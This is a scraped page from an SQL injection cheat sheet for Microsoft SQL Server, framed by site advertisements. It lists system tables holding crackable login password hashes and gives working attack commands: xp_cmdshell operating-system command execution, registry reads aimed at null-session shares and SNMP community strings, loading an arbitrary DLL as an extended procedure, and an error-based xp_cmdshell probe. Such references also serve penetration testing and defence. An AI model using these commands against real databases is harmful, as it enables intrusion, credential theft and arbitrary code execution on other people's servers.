Sql Injection Cheat Sheet Page 10
ADVERTISEMENT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18•
Linked Servers
master..sysservers
•
Password (2000 and 20005 both can be crackable, they use very similar hashing
algorithm )
SQL Server 2000:
masters..sysxlogins
SQL Server 2005 :
sys.sql_logins
More Stored Procedures for SQL Server (S)
1. Cmd Execute (xp_cmdshell)
exec master..xp_cmdshell 'dir'
2. Registry Stuff (xp_regread)
1. xp_regaddmultistring
2. xp_regdeletekey
3. xp_regdeletevalue
4. xp_regenumkeys
5. xp_regenumvalues
6. xp_regread
7. xp_regremovemultistring
8. xp_regwrite
exec xp_regread HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters',
'nullsessionshares'
exec xp_regenumvalues HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommuniti
es'
3. Managing Services (xp_servicecontrol)
4. Medias (xp_availablemedia)
5. ODBC Resources (xp_enumdsn)
6. Login mode (xp_loginconfig)
7. Creating Cab Files (xp_makecab)
8. Domain Enumeration (xp_ntsec_enumdomains)
9. Process Killing (need PID) (xp_terminate_process)
10. Add new procedure (virtually you can execute whatever you want)
sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’
exec xp_webserver
11. Write text file to a UNC or an internal path (sp_makewebtask)
MSSQL Bulk Notes
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF
(@result = 0) SELECT 0 ELSE SELECT 1/0
HOST_NAME()
IS_MEMBER (Transact-SQL)
ADVERTISEMENT
0 votes
Related Articles
Related forms
Related Categories
Parent category: Education